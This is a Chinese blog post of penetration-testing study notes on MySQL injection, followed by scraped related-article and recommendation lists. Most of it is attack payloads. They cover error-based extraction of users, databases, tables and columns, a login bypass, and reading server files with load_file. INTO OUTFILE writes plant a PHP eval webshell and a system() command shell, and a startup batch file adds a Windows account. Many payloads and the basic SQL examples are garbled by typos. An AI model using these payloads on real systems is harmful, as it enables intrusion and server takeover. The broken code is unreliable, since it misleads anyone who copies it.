大纲:MySQL介绍及操作  MySQL注入原理  MySQL注入其他操作

一、MySQL介绍及操作

  介绍 

    MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS

(Relational Database Management System,关系数据库管理系统) 应用软件。MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加

了速度并提高了灵活性。MySQL所使用的 SQL 语言是用于访问数据库的最常用标准化语言。MySQL 软件采用了双授权政策,分为社区版和商业版,由于其体积小、速度快、总体拥有成本低,尤其是开放

源码这一特点,一般中小型网站的开发都选择 MySQL 作为网站数据库。由于其社区版的性能卓越,搭配 PHP 和 Apache 可组成良好的开发环境。(源自百度百科)

  安装:

  Windows上  phpstudy  wamp  upupw  (都是集成好的)  iisthuweishen

  Linux上  yum-y  install  httpd  php  php-mysql  mysql-server

  简单的操作命令

    1、创建数据库

      CREATE DATABASE database-name

    2、删除数据库

      drop database dbname

    3、查询数据库

      CREATE TABLE MYTABLE(name VARCHAR(20),sex(HAR(1)));

    4、查看数据库

      show datbases;

    5、查看表

      show tables;

二、MySQL函数

  1、system_user()  系统用户名

  2、user()  用户名

  3、current_user  当前用户名

  4、session_user()  连接数据库的用户名

  5、database()  数据库名

  6、version()  MySQL数据库版本

  7、load_file()  转成16进制或10进制MySQL读取本地文件的函数

    select load_file('c:/123.txt');  可以将地址转16进制放入就无须单引号

  8、@@datadir  读取数据库路径

  9、@@basedir  MySQL数据库安装路径

  10、@@version_compile_os  操作系统

三、MySQL数据库连接

<?
$host='localhost'; //数据库地址
$datebase='sui'; //数据库名称
$user='root'; //数据库账户
$pass=''; //数据库密码
$pass=''; //数据库密码
$webml='/0/'; //安装文件夹
?>

一般在config.php  db_config.php文件中

lnclude/common.inc.php  一般在data文件夹下

四、数据库结构化对比

  access数据库

    A网站:adata.mdb

      表名(admin)

        列名(user,pass)

          值

    B网站:bdata.mdb

      表名(admin)

        列名(user,pass)

          值

  MySQL数据库

    A网站

    B网站

      表名

        列名

          值

五、MySQL注入原理

  注入产生原理以及防护绕过

  注入形成原理

  简单防注入原理

  绕过注入原理

  形成注入的原理:没有对输入的参数进行过滤

  防注入绕过

  大小写绕过

  %00编码绕过  截断关键字

  判断注入  手工(5.0以上)要用infromation函数,没有就用sqlmap

    and 1=1  and 1=2  这种只适用于没有上waf的

  判断多少列

    order by xx

    order by 21 正常  order by 22 不正常  说明有21列

六、MySQL其他注入

  MySQL 4.0渗透

    利用sqlmap注入读取文件

    查询表名

    sqlmap --sql-shell

    select load_file('/usr/www/index.php');

  MySQL显错注入

    判断是否存在注入,输入 '

    爆当前数据库的用户

    -999999999' union select 1 from (select count(*),concat(floorcrand(0)*2),(select user() limit(0,1) a from information_shema.tables group by a)b#

    爆当前数据库名称

    -999999999' union select 1 from (select count(*),concat(floorcrand(0)*2),(select database(), limit(0,1) a from information_schem.tables group by a)b#

    爆当前版本号

    -999999999' union select 1 from (select count(*),concat(floorcrand(0)*2),(select version() limit(0,1) a from information_schema.tables group by a)b#

    爆当前数据库

    -999999999' union select 1 from (select count(*),concat(select(select concat (0x27,0x27,hex(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    爆表

    ' and(select 1 from(select count(*),concat((select (select distinct concat(0x27,0x27 ,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x64656E67 (imit 0,1) from information_schema.tables group by x)a)#

    爆字段

    ' and(select 1 from(select count(*),concat((select (select distinct concat(0x7e,0x27 ,aolumn_name,0x27,0x7e) from information_schema,columns where table_schema=0x64656E67 and table_name=0x75736572 limit 0,1) from information_schema.tables group by x)a)#

    爆内容

    ' and(select 1 from(select count(*),concat((select (select distinct concat(0x7e,0x27 ,user,username.0x27,0x7e) from user limit 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*2))x from information_schema.tables group by x_a_#

    后台绕过

    select *from user where username="and password="

    输入:admin#   #表示注释后面的的代码

    select * from user where username='admin' # ' and password=''

    输入:admin' and or '1=1

    select * from user where username='admin' or '1=1' and password=''

七、MySQL读取函数的使用

  load_file()函数

  该函数使用来读取源文件的函数,只能读取绝对路径的网页文件。在使用load_file()时应该先找到网站的绝对路径

  例如:d:/www/xx/index.php

      /usr/src/apache/htdoc/index.php

  注意:

    1、路径符号“\”错误  “\\”正确    “/”正确

    2、转换十六进制数就不需要单引号

    /  Linux路径格式

    \  Windows路径格式

  获取网站根路径

  1、报错显示

  2、Googlehack  site:目标网站 warning

  3、遗留文件  phpinfo  info  test  php

  4、漏洞爆路径

  5、读取配置文件

  读取网站文件内容

  and 1=2 union select 1,foad_file('c:\\Inetpub\\wwwroot\\mysql_sql\\inc\\set_sql.php'),3,4,5,6,7,8,9

  and 1=2 union select 1,load_file(十六进制),3,4,5,6,7,8,9

  c:/windows/system32/inetsrv/metabase.xml

  写入函数 into outfile

  and 1=2 union select 1,"<?php @eval($_POST['cracer']);?>",3,4,5 into outfile 'c:/Inetpub/wwwroot/mysql-sql/cracer.txt'

八、利用注入漏洞执行系统命令

  1、需要wamp环境搭建,要系统权限才可以执行

  and 1=2 union select 1,"net user seven 123 /add",2,3,4 into outfile 'c:/Documents and Settings/Administrator/[开始]菜单/程序/启动/1.bat'

  2、

  and 1=2 union select 1,"<pre><body><?@system($_GET['cc'];?></body></pre>",2,3,4 into outfile 'c:/Inetpub/wwwroot/mysql-sql/cr.php'

九、魔术引号与宽字节注入

  该特性已自php5.3.0起废弃并于5.4.0起移除。当打开时,所有的单引号,双引号,反斜杠NULL字符都会自动加上一个反斜杠进行转义,这和addslashes()作用完全相同,一共有三个魔术引号指令:

  magic_quotes_gpc  影响到http请求数据(GET,POST和COOKIE)

  不能在运行时改变,在PHP默认的值为on参见get_magic_quotes_gpc()

  magic_quotes_runtime如果打开,大部分从外部来获取的数据并返回的函数,包括从数据库和文本文件,所返回的数据都会被反斜杠转义

  在运行时改变,在PHP中的默认值为off,参见set_magic_quotes_runntime()和get_magic_qutes_runtime()

  magic_quotes_sybase如果打开将会只用单引号对单引号进行转义而非反斜杠,此选项会玩全覆盖magic_quates_gpc

  如果同时打开两个选项,单引号会被转义成 " ,而双引号反斜杠和NULL字符不会转义

  如何取得其值,参见InI_got()

  使用宽字节注入绕过魔术引号

  %df%27

  sqlmap.py -u "xx.com/xx.php?id=1" --risk 3 --dbms =mysql-p username --tamper unmagicquotes.py -v 3

2019-05-02  17:28:15

渗透测试学习 十、 MSsql注入下的更多相关文章

  1. 渗透测试学习 十九、 XSS跨站脚本漏洞详解 续2

    二阶注入环境搭建 74cms 3.4 直接将源码放在PHPstudy的www路径下,在地址栏中输入127.0.0.1回车 然后进入网站首页,在填写简历里面存在二阶注入 先注册一个账号 创建简历 前面的 ...

  2. 渗透测试学习 十五、 文件上传&&解析漏洞

    大纲:文件解析漏洞 上传本地验证绕过 上传服务器验证绕过 文件解析漏洞 解析漏洞主要说的是一些特殊文件被IIS.Apache.Nginx在某些情况下解释成脚本文件格式的漏洞. IIS 5.x/6.0解 ...

  3. 渗透测试学习 十八、 XSS跨站脚本漏洞详解 续

    XSS平台搭建 ISS+zkeysphp 首先在IIS中新建一个网站,详细过程可以看我之前写搭环境的文章 (下面的写入选项不需要选中) 安装ZKEYS PHP 修改数据库配置 用户名:root 密码: ...

  4. Web安全学习笔记 SQL注入下

    Web安全学习笔记 SQL注入下 繁枝插云欣 --ICML8 SQL注入小技巧 CheatSheet 预编译 参考文章 一点心得 一.SQL注入小技巧 1. 宽字节注入 一般程序员用gbk编码做开发的 ...

  5. Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter

    Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter 原文链接:http://www.xuanhun521.com/Blog/7fc11b7a-b6cb-4 ...

  6. Kali Linux Web 渗透测试— 第十二课-websploit

    Kali Linux Web 渗透测试— 第十二课-websploit 文/玄魂 目录 Kali Linux Web 渗透测试— 第十二课-websploit..................... ...

  7. 渗透测试学习 九、 MSsql注入上

    MSsql注入漏洞详解 (Asp.Aspx站,常见于棋牌网站.考试网站.大学网站.政府网站.游戏网站.OA办公系统) 大纲:msSQL数据库调用分析 msSQL注入原理 msSQL注入另类玩法 msS ...

  8. 【渗透测试学习平台】 web for pentester -2.SQL注入

    Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/e ...

  9. 渗透测试学习 二十九、kali安装,信息搜集,服务器扫描

    kali安装,信息搜集,服务器扫描 kali介绍 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统.由Offensive Security Ltd维护和资助.最先由 ...

随机推荐

  1. Hacking/Penetrating tester bookmark collection

    Blogs http://carnal0wnage.blogspot.com/ http://www.mcgrewsecurity.com/ http://www.gnucitizen.org/blo ...

  2. dedecmsV5.7 arclist 如何调用副栏目的文章

    问题:用arclist 调用某个栏目下的文章的时候,发现无法调用出副栏目是这个栏目的文章. 然后就上百度搜了一番,记录一下我搜到的解决方法: 1.打开/include/taglib/arclist.l ...

  3. python保护变量(_),私有变量(__),私有方法,

    上图为常规代码 私有变量(__),私有方法:只是解释器换名字了,可以通过方法/实例字典发现改后的名字: 保护变量,解释器不做任何处理:只是开发者约定的,尽量不要改动: 此时实例无法修改__age属性值 ...

  4. echars line 底部图例强制不换行(滚动),修改图例样式

    { grid: { left: '5px', right: '10px', top: '10px', bottom: '40px', containLabel: true }, tooltip: { ...

  5. <Graph> Topological + Undirected Graph 310 Union Find 261 + 323 + (hard)305

    310. Minimum Height Trees queue:  degree为1的顶点 degree[ i ] : 和 i 顶点关联的边数. 先添加整个图,然后BFS删除每一层degree为1的节 ...

  6. C语言程序设计100例之(2):一元二次方程

    例2   一元二次方程 [题目描述] 输入系数a.b和c,求方程ax2+bx+c=0的根. [输入格式] 输入数据有多组.每组数据包括三个系数a,b,c.当a=0时,输入数据结束. [输出格式] 输出 ...

  7. 大话设计模式Python实现-命令模式

    命令模式(Command Pattern):将请求封装成对象,从而使可用不同的请求对客户进行参数化:对请求排队或记录请求日志,以及支持可撤消的操作. 下面是一个命令模式的demo: #!/usr/bi ...

  8. pytorch_模型参数-保存,加载,打印

    1.保存模型参数(gen-我自己的模型名字) torch.save(self.gen.state_dict(), os.path.join(self.gen_save_path, 'gen_%d.pt ...

  9. 【文本处理命令】之find搜索命令

    一.find搜索命令 find命令用于按照指定条件查找文件.在系统工作中find命令是不可缺少的,我们一般要查找某个目录下的文件时,都是使用find命令查找,另外find命令也可以配合对查找出的文件进 ...

  10. 解决 layui 弹出层(弹框)一闪而过就消失的问题 (转载)

    转载: 原文链接:https://blog.csdn.net/qq_20594019/article/details/83956532 本人遇到问题:使用layer.open()弹出页面层,出现弹框闪 ...